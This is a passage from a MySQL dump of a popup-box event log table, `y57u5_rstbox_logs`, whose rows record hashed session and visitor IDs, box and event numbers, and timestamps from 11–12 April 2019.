(77748, 'ebf4bb1130a008c47e13e6b625b73a23', '56bc97f28ff8f6d2', 0, 2, 1, '2019-04-11 08:15:49'),
(77749, 'ebf4bb1130a008c47e13e6b625b73a23', '56bc97f28ff8f6d2', 0, 2, 1, '2019-04-11 08:23:56'),
(77750, 'ebf4bb1130a008c47e13e6b625b73a23', '56bc97f28ff8f6d2', 0, 2, 1, '2019-04-11 08:24:25'),
(77751, 'ebf4bb1130a008c47e13e6b625b73a23', '56bc97f28ff8f6d2', 0, 2, 1, '2019-04-11 08:24:34'),
(77752, 'ebf4bb1130a008c47e13e6b625b73a23', '56bc97f28ff8f6d2', 0, 2, 1, '2019-04-11 08:27:01'),
(77753, 'ebf4bb1130a008c47e13e6b625b73a23', '56bc97f28ff8f6d2', 0, 2, 1, '2019-04-11 08:27:13'),
(77754, 'ebf4bb1130a008c47e13e6b625b73a23', '56bc97f28ff8f6d2', 0, 2, 1, '2019-04-11 08:27:41'),
(77755, 'ebf4bb1130a008c47e13e6b625b73a23', '56bc97f28ff8f6d2', 0, 2, 1, '2019-04-11 08:28:03'),
(77756, 'ebf4bb1130a008c47e13e6b625b73a23', '56bc97f28ff8f6d2', 0, 2, 1, '2019-04-11 08:31:23'),
(77757, '054a5423ffd41c1901003e62a39baf1b', '7c730730cabc053d', 0, 2, 1, '2019-04-11 08:37:47'),
(77758, '2379a0ccb2a55c7314842fd67bf839e4', 'c2d31113ea50f1c5', 0, 2, 1, '2019-04-11 09:09:15'),
(77759, '2379a0ccb2a55c7314842fd67bf839e4', 'c2d31113ea50f1c5', 0, 2, 1, '2019-04-11 09:10:40'),
(77760, '2379a0ccb2a55c7314842fd67bf839e4', 'c2d31113ea50f1c5', 0, 2, 1, '2019-04-11 09:11:18'),
(77761, '922068abd456eba43d55bf35cffc418a', '939fbcee39b8c410', 0, 2, 1, '2019-04-11 10:08:01'),
(77762, '922068abd456eba43d55bf35cffc418a', '939fbcee39b8c410', 0, 2, 1, '2019-04-11 10:10:14'),
(77763, 'ecc02dbe9560ae9ccd3a54e255644ab1', 'dca300daf9b9b5ea', 0, 2, 1, '2019-04-11 10:38:52'),
(77764, '8488434a7e2187bcaf7ce357b9501c01', 'bad01209c06d24a2', 0, 2, 1, '2019-04-11 10:43:02'),
(77765, '21aac72975761eaf3c70b87b43306185', '79eb90fd74995a69', 0, 2, 1, '2019-04-11 10:48:53'),
(77766, '7e2685da588c03927ab821a63cece0cf', '5e4900ff7c6e2b5d', 0, 2, 1, '2019-04-11 11:03:47'),
(77767, 'b7fbea9d9b6b72dd943c28f19068c62c', '8d0ce8d2f494ec99', 0, 2, 1, '2019-04-11 11:07:01'),
(77768, 'b7fbea9d9b6b72dd943c28f19068c62c', '8d0ce8d2f494ec99', 0, 2, 1, '2019-04-11 11:10:16'),
(77769, '01859019b70cd0e4103e1f562d60ded5', '911aea681f532680', 0, 2, 1, '2019-04-11 12:35:35'),
(77770, 'b2e66cdadb0bd8d898586f062c3baa35', 'd917c75ccb1bfb01', 0, 2, 1, '2019-04-11 12:46:18'),
(77771, '84323bd5d194a03f521110e1a3a171be', '041b8875dc2a15a5', 0, 2, 1, '2019-04-11 12:59:36'),
(77772, '9bc3921d6f1f043c8609e262a6569d3c', '7ab01b7f7350b64f', 0, 2, 1, '2019-04-11 13:21:00'),
(77773, '6ecddb603eab9622bb88d03cba35c0cc', 'f22501eb53bcfcaa', 0, 2, 1, '2019-04-11 14:56:22'),
(77774, 'b28f2fb47623fbc2f17f9ab0bb6b34f9', 'ccdfa4c67082a494', 0, 2, 1, '2019-04-11 15:42:14'),
(77775, 'b28f2fb47623fbc2f17f9ab0bb6b34f9', 'ccdfa4c67082a494', 0, 2, 1, '2019-04-11 15:42:19'),
(77776, 'df2de678a7fd2a6740a6bf6332fd0708', '9ac765759792912f', 0, 2, 1, '2019-04-11 15:48:00'),
(77777, 'b93d98323bfafddb62811a2023226afb', '8fcbcbf2903f3023', 0, 2, 1, '2019-04-11 16:05:29'),
(77778, 'b93d98323bfafddb62811a2023226afb', '8fcbcbf2903f3023', 0, 2, 1, '2019-04-11 16:08:58'),
(77779, 'bba1ed4c6d4a0c32cffd75323ec87c05', 'e2e7727fac3495db', 0, 2, 1, '2019-04-11 16:09:33'),
(77780, '4e52b426034718fa3b2c1085751da7e8', '11636e00ced39386', 0, 2, 1, '2019-04-11 16:29:38'),
(77781, '4b05d825d03cd48fb3f7b05de778853e', '4a963647a27b6025', 0, 2, 1, '2019-04-11 17:03:09'),
(77782, 'c3d4620985b8d68c93fffd905e297353', '3cfca37777c71b51', 0, 2, 1, '2019-04-11 19:21:06'),
(77783, '0d4a141a838d7087e04ed0339502210a', '62ca2d744f0c44cc', 0, 2, 1, '2019-04-11 19:40:56'),
(77784, '0d4a141a838d7087e04ed0339502210a', '62ca2d744f0c44cc', 0, 2, 1, '2019-04-11 19:41:24'),
(77785, '0d4a141a838d7087e04ed0339502210a', '62ca2d744f0c44cc', 0, 2, 1, '2019-04-11 19:41:42'),
(77786, 'faf6c77f41a0dfeab20370d2538a02fe', '826ffa39fb70cfa6', 0, 2, 1, '2019-04-11 20:04:56'),
(77787, '9642f79ec63846e636289d1cd19aea83', 'd83be9192f556fc0', 0, 2, 1, '2019-04-11 20:07:37'),
(77788, '8da8a748fb3ccb910fe3ff4cfe996887', 'b2d25c8f054bf5a8', 0, 2, 1, '2019-04-11 20:08:27'),
(77789, '6a676098390a2d0a2f9de68b123d35fd', 'd8f68df0bfef1338', 0, 2, 1, '2019-04-11 20:16:49'),
(77790, '8ec33419faf31b910c79c2be284774ae', 'ccc82a0493cf1d92', 0, 2, 1, '2019-04-11 20:17:13'),
(77791, '8ec33419faf31b910c79c2be284774ae', 'ccc82a0493cf1d92', 0, 2, 1, '2019-04-11 20:18:16'),
(77792, 'd793abd8daf03db22bd1c534bac8fa26', '58bf48290abf8cbc', 0, 2, 1, '2019-04-11 20:19:47'),
(77793, '6d3c477597fcb0e2e1328f5a67c98acf', '34bbbaa9ab931b34', 0, 2, 1, '2019-04-11 20:20:24'),
(77794, 'd793abd8daf03db22bd1c534bac8fa26', '58bf48290abf8cbc', 0, 2, 1, '2019-04-11 20:20:33'),
(77795, '6d3c477597fcb0e2e1328f5a67c98acf', '34bbbaa9ab931b34', 0, 2, 1, '2019-04-11 20:20:41'),
(77796, 'd793abd8daf03db22bd1c534bac8fa26', '58bf48290abf8cbc', 0, 2, 1, '2019-04-11 20:21:20'),
(77797, 'd793abd8daf03db22bd1c534bac8fa26', '58bf48290abf8cbc', 0, 2, 1, '2019-04-11 20:22:08'),
(77798, '6d3c477597fcb0e2e1328f5a67c98acf', '34bbbaa9ab931b34', 0, 2, 1, '2019-04-11 20:23:19'),
(77799, '455a5dcb072116ee425a2b5647424005', 'df27b9a2919a8206', 0, 2, 1, '2019-04-11 20:24:54'),
(77800, '9fd95d2edb587c9b009c75f1e40a34f2', 'b5569667369b4c76', 0, 2, 1, '2019-04-11 20:25:08'),
(77801, '9fd95d2edb587c9b009c75f1e40a34f2', 'b5569667369b4c76', 0, 2, 1, '2019-04-11 20:25:22'),
(77802, '455a5dcb072116ee425a2b5647424005', 'df27b9a2919a8206', 0, 2, 1, '2019-04-11 20:26:28'),
(77803, '455a5dcb072116ee425a2b5647424005', 'df27b9a2919a8206', 0, 2, 1, '2019-04-11 20:34:41'),
(77804, '984f048010e83921e7f8c89c45fa1b85', 'b4ecb18ba7992a18', 0, 2, 1, '2019-04-11 20:35:14'),
(77805, '984f048010e83921e7f8c89c45fa1b85', 'b4ecb18ba7992a18', 0, 2, 1, '2019-04-11 20:37:20'),
(77806, '984f048010e83921e7f8c89c45fa1b85', 'b4ecb18ba7992a18', 0, 2, 1, '2019-04-11 20:38:07'),
(77807, '455a5dcb072116ee425a2b5647424005', 'df27b9a2919a8206', 0, 2, 1, '2019-04-11 20:41:09'),
(77808, '455a5dcb072116ee425a2b5647424005', 'df27b9a2919a8206', 0, 2, 1, '2019-04-11 20:58:22'),
(77809, '4ae4b5c1058cbd62ef973a21e11c21db', '503a514a8daa32a7', 0, 2, 1, '2019-04-11 20:59:46'),
(77810, '455a5dcb072116ee425a2b5647424005', 'df27b9a2919a8206', 0, 2, 1, '2019-04-11 21:00:54'),
(77811, '4ae4b5c1058cbd62ef973a21e11c21db', '503a514a8daa32a7', 0, 2, 1, '2019-04-11 21:01:42'),
(77812, '4ae4b5c1058cbd62ef973a21e11c21db', '503a514a8daa32a7', 0, 2, 1, '2019-04-11 21:02:26'),
(77813, '455a5dcb072116ee425a2b5647424005', 'df27b9a2919a8206', 0, 2, 1, '2019-04-11 21:02:55'),
(77814, '455a5dcb072116ee425a2b5647424005', 'df27b9a2919a8206', 0, 2, 1, '2019-04-11 21:03:19'),
(77815, '455a5dcb072116ee425a2b5647424005', 'df27b9a2919a8206', 0, 2, 1, '2019-04-11 21:03:32'),
(77816, '4ae4b5c1058cbd62ef973a21e11c21db', '503a514a8daa32a7', 0, 2, 1, '2019-04-11 21:03:32'),
(77817, '4ae4b5c1058cbd62ef973a21e11c21db', '503a514a8daa32a7', 0, 2, 1, '2019-04-11 21:03:52'),
(77818, '7c58fa48b9070e6ce75a2f3549460120', 'a241b97c40d2b2c5', 0, 2, 1, '2019-04-11 21:04:50'),
(77819, '7c58fa48b9070e6ce75a2f3549460120', 'a241b97c40d2b2c5', 0, 2, 1, '2019-04-11 21:05:26'),
(77820, '7eb56f99bfd3f36439de5b39c1956656', '12ed21842ec29d17', 0, 2, 1, '2019-04-11 21:05:32'),
(77821, '455a5dcb072116ee425a2b5647424005', 'df27b9a2919a8206', 0, 2, 1, '2019-04-11 21:05:38'),
(77822, '4ae4b5c1058cbd62ef973a21e11c21db', '503a514a8daa32a7', 0, 2, 1, '2019-04-11 21:05:40'),
(77823, '7eb56f99bfd3f36439de5b39c1956656', '12ed21842ec29d17', 0, 2, 1, '2019-04-11 21:05:52'),
(77824, '7c58fa48b9070e6ce75a2f3549460120', 'a241b97c40d2b2c5', 0, 2, 1, '2019-04-11 21:06:08'),
(77825, '4ae4b5c1058cbd62ef973a21e11c21db', '503a514a8daa32a7', 0, 2, 1, '2019-04-11 21:06:50'),
(77826, '55b69de4ec97b59596f8368a2b4aab4b', '483313bcaa5a7274', 0, 2, 1, '2019-04-11 21:07:16'),
(77827, '55b69de4ec97b59596f8368a2b4aab4b', '483313bcaa5a7274', 0, 2, 1, '2019-04-11 21:07:30'),
(77828, '455a5dcb072116ee425a2b5647424005', 'df27b9a2919a8206', 0, 2, 1, '2019-04-11 21:07:58'),
(77829, '455a5dcb072116ee425a2b5647424005', 'df27b9a2919a8206', 0, 2, 1, '2019-04-11 21:08:05'),
(77830, '455a5dcb072116ee425a2b5647424005', 'df27b9a2919a8206', 0, 2, 1, '2019-04-11 21:08:17'),
(77831, '455a5dcb072116ee425a2b5647424005', 'df27b9a2919a8206', 0, 2, 1, '2019-04-11 21:09:18'),
(77832, '4ae4b5c1058cbd62ef973a21e11c21db', '503a514a8daa32a7', 0, 2, 1, '2019-04-11 21:09:18'),
(77833, '55b69de4ec97b59596f8368a2b4aab4b', '483313bcaa5a7274', 0, 2, 1, '2019-04-11 21:09:39'),
(77834, '55b69de4ec97b59596f8368a2b4aab4b', '483313bcaa5a7274', 0, 2, 1, '2019-04-11 21:09:53'),
(77835, '4ae4b5c1058cbd62ef973a21e11c21db', '503a514a8daa32a7', 0, 2, 1, '2019-04-11 21:10:02'),
(77836, '02878692589dbd04fa3a9bdf85218236', '614fcbb79b5160d2', 0, 2, 1, '2019-04-11 21:10:48'),
(77837, '4ae4b5c1058cbd62ef973a21e11c21db', '503a514a8daa32a7', 0, 2, 1, '2019-04-11 21:10:50'),
(77838, '455a5dcb072116ee425a2b5647424005', 'df27b9a2919a8206', 0, 2, 1, '2019-04-11 21:11:13'),
(77839, '02878692589dbd04fa3a9bdf85218236', '614fcbb79b5160d2', 0, 2, 1, '2019-04-11 21:11:17'),
(77840, '455a5dcb072116ee425a2b5647424005', 'df27b9a2919a8206', 0, 2, 1, '2019-04-11 21:11:51'),
(77841, '55b69de4ec97b59596f8368a2b4aab4b', '483313bcaa5a7274', 0, 2, 1, '2019-04-11 21:13:19'),
(77842, '7eb56f99bfd3f36439de5b39c1956656', '12ed21842ec29d17', 0, 2, 1, '2019-04-11 21:13:51'),
(77843, 'c331d4cecbbecb518ae33c9771267299', '324d0c5c1f480926', 0, 2, 1, '2019-04-11 21:14:13'),
(77844, '455a5dcb072116ee425a2b5647424005', 'df27b9a2919a8206', 0, 2, 1, '2019-04-11 21:14:32'),
(77845, '455a5dcb072116ee425a2b5647424005', 'df27b9a2919a8206', 0, 2, 1, '2019-04-11 21:14:48'),
(77846, '02878692589dbd04fa3a9bdf85218236', '614fcbb79b5160d2', 0, 2, 1, '2019-04-11 21:15:00'),
(77847, '4ae4b5c1058cbd62ef973a21e11c21db', '503a514a8daa32a7', 0, 2, 1, '2019-04-11 21:15:22'),
(77848, '8666d62ce630014be12f0713ed88ebf4', '34c47e13358cead7', 0, 2, 1, '2019-04-11 21:15:46'),
(77849, '7eb56f99bfd3f36439de5b39c1956656', '12ed21842ec29d17', 0, 2, 1, '2019-04-11 21:17:07'),
(77850, '455a5dcb072116ee425a2b5647424005', 'df27b9a2919a8206', 0, 2, 1, '2019-04-11 21:17:31'),
(77851, '7eb56f99bfd3f36439de5b39c1956656', '12ed21842ec29d17', 0, 2, 1, '2019-04-11 21:17:38'),
(77852, '7eb56f99bfd3f36439de5b39c1956656', '12ed21842ec29d17', 0, 2, 1, '2019-04-11 21:17:54'),
(77853, '768738fa965071229185cffa4cc44e2b', '614fcbb79b5160d2', 0, 2, 1, '2019-04-11 21:18:00'),
(77854, '7eb56f99bfd3f36439de5b39c1956656', '12ed21842ec29d17', 0, 2, 1, '2019-04-11 21:18:06'),
(77855, '4ae4b5c1058cbd62ef973a21e11c21db', '503a514a8daa32a7', 0, 2, 1, '2019-04-11 21:18:39'),
(77856, '455a5dcb072116ee425a2b5647424005', 'df27b9a2919a8206', 0, 2, 1, '2019-04-11 21:18:46'),
(77857, '7eb56f99bfd3f36439de5b39c1956656', '12ed21842ec29d17', 0, 2, 1, '2019-04-11 21:19:12'),
(77858, '7eb56f99bfd3f36439de5b39c1956656', '12ed21842ec29d17', 0, 2, 1, '2019-04-11 21:20:11'),
(77859, '55b69de4ec97b59596f8368a2b4aab4b', '483313bcaa5a7274', 0, 2, 1, '2019-04-11 21:20:34'),
(77860, '768738fa965071229185cffa4cc44e2b', '614fcbb79b5160d2', 0, 2, 1, '2019-04-11 21:21:36'),
(77861, '55b69de4ec97b59596f8368a2b4aab4b', '483313bcaa5a7274', 0, 2, 1, '2019-04-11 21:22:23'),
(77862, '768738fa965071229185cffa4cc44e2b', '614fcbb79b5160d2', 0, 2, 1, '2019-04-11 21:23:54'),
(77863, '455a5dcb072116ee425a2b5647424005', 'df27b9a2919a8206', 0, 2, 1, '2019-04-11 21:24:46'),
(77864, '4ae4b5c1058cbd62ef973a21e11c21db', '503a514a8daa32a7', 0, 2, 1, '2019-04-11 21:25:23'),
(77865, '55b69de4ec97b59596f8368a2b4aab4b', '483313bcaa5a7274', 0, 2, 1, '2019-04-11 21:26:32'),
(77866, '7eb56f99bfd3f36439de5b39c1956656', '12ed21842ec29d17', 0, 2, 1, '2019-04-11 21:26:34'),
(77867, '8666d62ce630014be12f0713ed88ebf4', '34c47e13358cead7', 0, 2, 1, '2019-04-11 21:29:19'),
(77868, 'df38b3b75f857da0c72c5a5691960ec9', 'b512fd170584454c', 0, 2, 1, '2019-04-11 21:33:19'),
(77869, '4e1ff2653c9b3488901425b1a67925fd', '5716bfdec5db86c3', 0, 2, 1, '2019-04-11 21:33:34'),
(77870, '4e1ff2653c9b3488901425b1a67925fd', '5716bfdec5db86c3', 0, 2, 1, '2019-04-11 21:33:34'),
(77871, 'df38b3b75f857da0c72c5a5691960ec9', 'b512fd170584454c', 0, 2, 1, '2019-04-11 21:33:43'),
(77872, '4e1ff2653c9b3488901425b1a67925fd', '5716bfdec5db86c3', 0, 2, 1, '2019-04-11 21:34:39'),
(77873, '0f3d17c1fc3f2e2a510f536b009228c3', 'cdcd449d36198205', 0, 2, 1, '2019-04-11 21:37:36'),
(77874, '8bc22a835198d50b3c93c9de34940b94', '483313bcaa5a7274', 0, 2, 1, '2019-04-11 21:46:22'),
(77875, 'ff739e140bbf9bdde588e2e7596d4ac0', '10c244cbf2decc1e', 0, 2, 1, '2019-04-11 21:47:25'),
(77876, '1ca05eb3751f9597558cc0ba2be5c20d', 'b0d8f30309f0c8fb', 0, 2, 1, '2019-04-11 21:49:03'),
(77877, '9a9955964090147dba6465c4f2fe6dd5', 'a1e2ea8331e86445', 0, 2, 1, '2019-04-11 21:55:10'),
(77878, '698557d9ec631e38952ba5db68eb5850', 'ddcd269428326cc0', 0, 2, 1, '2019-04-11 21:58:09'),
(77879, '57f64d1ec836836a0d5d175e3c34ccbb', 'c99fa9a9d7581918', 0, 2, 1, '2019-04-11 22:06:34'),
(77880, 'c350a256f6710ce2d3c8c93440706fff', '68a7186165554fef', 0, 2, 1, '2019-04-11 22:20:02'),
(77881, 'c954ff38c3c81b0d3febece5e6e68537', 'aed3e405ac56428f', 0, 2, 1, '2019-04-11 22:20:24'),
(77882, 'c954ff38c3c81b0d3febece5e6e68537', 'aed3e405ac56428f', 0, 2, 1, '2019-04-11 22:21:10'),
(77883, '59dd12dd073a50074a9b34ba5ecf8776', '8d0ce8d2f494ec99', 0, 2, 1, '2019-04-11 22:22:57'),
(77884, '59dd12dd073a50074a9b34ba5ecf8776', '8d0ce8d2f494ec99', 0, 2, 1, '2019-04-11 22:23:40'),
(77885, '7657c73ec1ea8c06b657e2ad281103bf', 'ed7a9749e0689b64', 0, 2, 1, '2019-04-11 22:25:32'),
(77886, '7ab4f833614e00a1c7ad25153e8ceed2', 'eb2854fabd57280d', 0, 2, 1, '2019-04-11 22:27:36'),
(77887, '8650072d4efb6f6a5b7d554ef5abc612', '5a98505f0172f8f5', 0, 2, 1, '2019-04-11 22:35:48'),
(77888, '8650072d4efb6f6a5b7d554ef5abc612', '5a98505f0172f8f5', 0, 2, 1, '2019-04-11 22:36:21'),
(77889, '8650072d4efb6f6a5b7d554ef5abc612', '5a98505f0172f8f5', 0, 2, 1, '2019-04-11 22:37:00'),
(77890, '3744b53b45b1129ddb34412c893e6e1f', 'c5b27d2acf4d63c1', 0, 2, 1, '2019-04-11 22:42:44'),
(77891, 'ed17476f7f3aeb2b0d045acea2c2409d', 'c87f31419117b4ac', 0, 2, 1, '2019-04-11 22:43:10'),
(77892, 'd793abd8daf03db22bd1c534bac8fa26', '58bf48290abf8cbc', 0, 2, 1, '2019-04-11 22:53:24'),
(77893, 'd793abd8daf03db22bd1c534bac8fa26', '58bf48290abf8cbc', 0, 2, 1, '2019-04-11 22:54:35'),
(77894, 'ea8b1d6b2c993f4f1deb24c227c88587', 'e3253903040248a2', 0, 2, 1, '2019-04-11 22:58:05'),
(77895, 'ea8b1d6b2c993f4f1deb24c227c88587', 'e3253903040248a2', 0, 2, 1, '2019-04-11 23:00:53'),
(77896, '88b37d44c92aa01e0f9a57849eb1ebee', '5b3051f95f43261f', 0, 2, 1, '2019-04-11 23:01:34'),
(77897, '4e1ff2653c9b3488901425b1a67925fd', '5716bfdec5db86c3', 0, 2, 1, '2019-04-11 23:02:50'),
(77898, '88b37d44c92aa01e0f9a57849eb1ebee', '5b3051f95f43261f', 0, 2, 1, '2019-04-11 23:04:24'),
(77899, '4662775386976d63e5204363c44e509a', '878ee8fb6335aff4', 0, 2, 1, '2019-04-11 23:04:50'),
(77900, 'd81433db5e790f76b3a0f2a2aaaecaab', 'e3253903040248a2', 0, 2, 1, '2019-04-11 23:12:18'),
(77901, '4e1ff2653c9b3488901425b1a67925fd', '5716bfdec5db86c3', 0, 2, 1, '2019-04-11 23:17:51'),
(77902, 'c17d77364140207d33f673aa42169c3b', '7d3e015101cab243', 0, 2, 1, '2019-04-11 23:18:49'),
(77903, '33133b04fd7b07d3bd905164870e1dc2', 'f39c7d2f8bb7f344', 0, 2, 1, '2019-04-11 23:20:29'),
(77904, '4ae4b5c1058cbd62ef973a21e11c21db', '503a514a8daa32a7', 0, 2, 1, '2019-04-11 23:27:26'),
(77905, '4ae4b5c1058cbd62ef973a21e11c21db', '503a514a8daa32a7', 0, 2, 1, '2019-04-11 23:33:46'),
(77906, '7eb56f99bfd3f36439de5b39c1956656', '12ed21842ec29d17', 0, 2, 1, '2019-04-11 23:34:40'),
(77907, '7eb56f99bfd3f36439de5b39c1956656', '12ed21842ec29d17', 0, 2, 1, '2019-04-11 23:34:44'),
(77908, '7ab4f833614e00a1c7ad25153e8ceed2', 'eb2854fabd57280d', 0, 2, 1, '2019-04-11 23:36:13'),
(77909, '88b37d44c92aa01e0f9a57849eb1ebee', '5b3051f95f43261f', 0, 2, 1, '2019-04-11 23:36:29'),
(77910, 'b84d298c05b750e5272c52cd7140db29', 'a1e2ea8331e86445', 0, 2, 1, '2019-04-11 23:38:20'),
(77911, '9ae3dda5e15e20b23b7883ffd6bc5deb', 'ed8fddef90c77d16', 0, 2, 1, '2019-04-11 23:38:47'),
(77912, 'c17d77364140207d33f673aa42169c3b', '7d3e015101cab243', 0, 2, 1, '2019-04-11 23:42:28'),
(77913, '33133b04fd7b07d3bd905164870e1dc2', 'f39c7d2f8bb7f344', 0, 2, 1, '2019-04-11 23:48:16'),
(77914, '4e4916bc6feceec0e83b202a9ebaa3e8', 'cb1805ab847b2d09', 0, 2, 1, '2019-04-12 00:09:10'),
(77915, '4e4916bc6feceec0e83b202a9ebaa3e8', 'cb1805ab847b2d09', 0, 2, 1, '2019-04-12 00:11:19'),
(77916, '88b37d44c92aa01e0f9a57849eb1ebee', '5b3051f95f43261f', 0, 2, 1, '2019-04-12 00:12:56'),
(77917, '7eb56f99bfd3f36439de5b39c1956656', '12ed21842ec29d17', 0, 2, 1, '2019-04-12 00:13:56'),
(77918, '7eb56f99bfd3f36439de5b39c1956656', '12ed21842ec29d17', 0, 2, 1, '2019-04-12 00:14:05'),
(77919, '7ab4f833614e00a1c7ad25153e8ceed2', 'eb2854fabd57280d', 0, 2, 1, '2019-04-12 00:14:08'),
(77920, '88b37d44c92aa01e0f9a57849eb1ebee', '5b3051f95f43261f', 0, 2, 1, '2019-04-12 00:15:07'),
(77921, 'fc25d6936d45433d429908850cef41b7', 'e3253903040248a2', 0, 2, 1, '2019-04-12 00:15:22'),
(77922, '88b37d44c92aa01e0f9a57849eb1ebee', '5b3051f95f43261f', 0, 2, 1, '2019-04-12 00:16:26'),
(77923, '88b37d44c92aa01e0f9a57849eb1ebee', '5b3051f95f43261f', 0, 2, 1, '2019-04-12 00:30:32'),
(77924, '7ab4f833614e00a1c7ad25153e8ceed2', 'eb2854fabd57280d', 0, 2, 1, '2019-04-12 00:30:53'),
(77925, '88b37d44c92aa01e0f9a57849eb1ebee', '5b3051f95f43261f', 0, 2, 1, '2019-04-12 00:31:09'),
(77926, '88b37d44c92aa01e0f9a57849eb1ebee', '5b3051f95f43261f', 0, 2, 1, '2019-04-12 00:32:06'),
(77927, '88b37d44c92aa01e0f9a57849eb1ebee', '5b3051f95f43261f', 0, 2, 1, '2019-04-12 00:32:33');
INSERT INTO `y57u5_rstbox_logs` (`id`, `sessionid`, `visitorid`, `user`, `box`, `event`, `date`) VALUES
(77928, '7ab4f833614e00a1c7ad25153e8ceed2', 'eb2854fabd57280d', 0, 2, 1, '2019-04-12 00:56:20'),
(77929, '88b37d44c92aa01e0f9a57849eb1ebee', '5b3051f95f43261f', 0, 2, 1, '2019-04-12 00:56:24'),
(77930, '7ab4f833614e00a1c7ad25153e8ceed2', 'eb2854fabd57280d', 0, 2, 1, '2019-04-12 00:56:47'),
(77931, '88b37d44c92aa01e0f9a57849eb1ebee', '5b3051f95f43261f', 0, 2, 1, '2019-04-12 00:57:10'),
(77932, '4ae4b5c1058cbd62ef973a21e11c21db', '503a514a8daa32a7', 0, 2, 1, '2019-04-12 00:57:32'),
(77933, '7eb56f99bfd3f36439de5b39c1956656', '12ed21842ec29d17', 0, 2, 1, '2019-04-12 00:57:36'),
(77934, '7eb56f99bfd3f36439de5b39c1956656', '12ed21842ec29d17', 0, 2, 1, '2019-04-12 00:57:45'),
(77935, '7eb56f99bfd3f36439de5b39c1956656', '12ed21842ec29d17', 0, 2, 1, '2019-04-12 00:57:52'),
(77936, '4ae4b5c1058cbd62ef973a21e11c21db', '503a514a8daa32a7', 0, 2, 1, '2019-04-12 00:57:55'),
(77937, '7ab4f833614e00a1c7ad25153e8ceed2', 'eb2854fabd57280d', 0, 2, 1, '2019-04-12 00:58:00'),
(77938, '88b37d44c92aa01e0f9a57849eb1ebee', '5b3051f95f43261f', 0, 2, 1, '2019-04-12 00:58:02'),
(77939, '7eb56f99bfd3f36439de5b39c1956656', '12ed21842ec29d17', 0, 2, 1, '2019-04-12 00:58:04'),
(77940, '4ae4b5c1058cbd62ef973a21e11c21db', '503a514a8daa32a7', 0, 2, 1, '2019-04-12 00:58:29'),
(77941, '7ab4f833614e00a1c7ad25153e8ceed2', 'eb2854fabd57280d', 0, 2, 1, '2019-04-12 00:58:38'),
(77942, '7eb56f99bfd3f36439de5b39c1956656', '12ed21842ec29d17', 0, 2, 1, '2019-04-12 00:58:39'),
(77943, '455a5dcb072116ee425a2b5647424005', 'df27b9a2919a8206', 0, 2, 1, '2019-04-12 00:58:40'),
(77944, '4ae4b5c1058cbd62ef973a21e11c21db', '503a514a8daa32a7', 0, 2, 1, '2019-04-12 00:58:42'),
(77945, '88b37d44c92aa01e0f9a57849eb1ebee', '5b3051f95f43261f', 0, 2, 1, '2019-04-12 00:58:53'),
(77946, '4ae4b5c1058cbd62ef973a21e11c21db', '503a514a8daa32a7', 0, 2, 1, '2019-04-12 00:58:55'),
(77947, '7eb56f99bfd3f36439de5b39c1956656', '12ed21842ec29d17', 0, 2, 1, '2019-04-12 00:59:01'),
(77948, '7ab4f833614e00a1c7ad25153e8ceed2', 'eb2854fabd57280d', 0, 2, 1, '2019-04-12 00:59:03'),
(77949, '7eb56f99bfd3f36439de5b39c1956656', '12ed21842ec29d17', 0, 2, 1, '2019-04-12 00:59:18'),
(77950, '4ae4b5c1058cbd62ef973a21e11c21db', '503a514a8daa32a7', 0, 2, 1, '2019-04-12 00:59:23'),
(77951, '7ab4f833614e00a1c7ad25153e8ceed2', 'eb2854fabd57280d', 0, 2, 1, '2019-04-12 00:59:32'),
(77952, '7eb56f99bfd3f36439de5b39c1956656', '12ed21842ec29d17', 0, 2, 1, '2019-04-12 00:59:38'),
(77953, '4ae4b5c1058cbd62ef973a21e11c21db', '503a514a8daa32a7', 0, 2, 1, '2019-04-12 00:59:46'),
(77954, '88b37d44c92aa01e0f9a57849eb1ebee', '5b3051f95f43261f', 0, 2, 1, '2019-04-12 01:00:12'),
(77955, '455a5dcb072116ee425a2b5647424005', 'df27b9a2919a8206', 0, 2, 1, '2019-04-12 01:00:13'),
(77956, 'b84d298c05b750e5272c52cd7140db29', 'a1e2ea8331e86445', 0, 2, 1, '2019-04-12 01:00:17'),
(77957, '7ab4f833614e00a1c7ad25153e8ceed2', 'eb2854fabd57280d', 0, 2, 1, '2019-04-12 01:00:24'),
(77958, '4ae4b5c1058cbd62ef973a21e11c21db', '503a514a8daa32a7', 0, 2, 1, '2019-04-12 01:00:32'),
(77959, '51aaf029b2529699f07a8fd915100e90', '14d059e5da6bdba4', 0, 2, 1, '2019-04-12 01:00:40'),
(77960, 'b84d298c05b750e5272c52cd7140db29', 'a1e2ea8331e86445', 0, 2, 1, '2019-04-12 01:00:41'),
(77961, '4ae4b5c1058cbd62ef973a21e11c21db', '503a514a8daa32a7', 0, 2, 1, '2019-04-12 01:00:50'),
(77962, '4ae4b5c1058cbd62ef973a21e11c21db', '503a514a8daa32a7', 0, 2, 1, '2019-04-12 01:01:11'),
(77963, '455a5dcb072116ee425a2b5647424005', 'df27b9a2919a8206', 0, 2, 1, '2019-04-12 01:01:14'),
(77964, '4ae4b5c1058cbd62ef973a21e11c21db', '503a514a8daa32a7', 0, 2, 1, '2019-04-12 01:01:18'),
(77965, '51aaf029b2529699f07a8fd915100e90', '14d059e5da6bdba4', 0, 2, 1, '2019-04-12 01:01:32'),
(77966, '4ae4b5c1058cbd62ef973a21e11c21db', '503a514a8daa32a7', 0, 2, 1, '2019-04-12 01:01:42'),
(77967, '7eb56f99bfd3f36439de5b39c1956656', '12ed21842ec29d17', 0, 2, 1, '2019-04-12 01:01:45'),
(77968, '88b37d44c92aa01e0f9a57849eb1ebee', '5b3051f95f43261f', 0, 2, 1, '2019-04-12 01:01:50'),
(77969, 'b84d298c05b750e5272c52cd7140db29', 'a1e2ea8331e86445', 0, 2, 1, '2019-04-12 01:01:52'),
(77970, '64a41f22d5f67f2c9e66f6740444af8e', '575b738595cdb2f5', 0, 2, 1, '2019-04-12 01:02:18'),
(77971, '455a5dcb072116ee425a2b5647424005', 'df27b9a2919a8206', 0, 2, 1, '2019-04-12 01:03:01'),
(77972, 'fc25d6936d45433d429908850cef41b7', 'e3253903040248a2', 0, 2, 1, '2019-04-12 01:04:59'),
(77973, '4e4916bc6feceec0e83b202a9ebaa3e8', 'cb1805ab847b2d09', 0, 2, 1, '2019-04-12 01:05:05'),
(77974, '4e4916bc6feceec0e83b202a9ebaa3e8', 'cb1805ab847b2d09', 0, 2, 1, '2019-04-12 01:05:11'),
(77975, '4e4916bc6feceec0e83b202a9ebaa3e8', 'cb1805ab847b2d09', 0, 2, 1, '2019-04-12 01:05:27'),
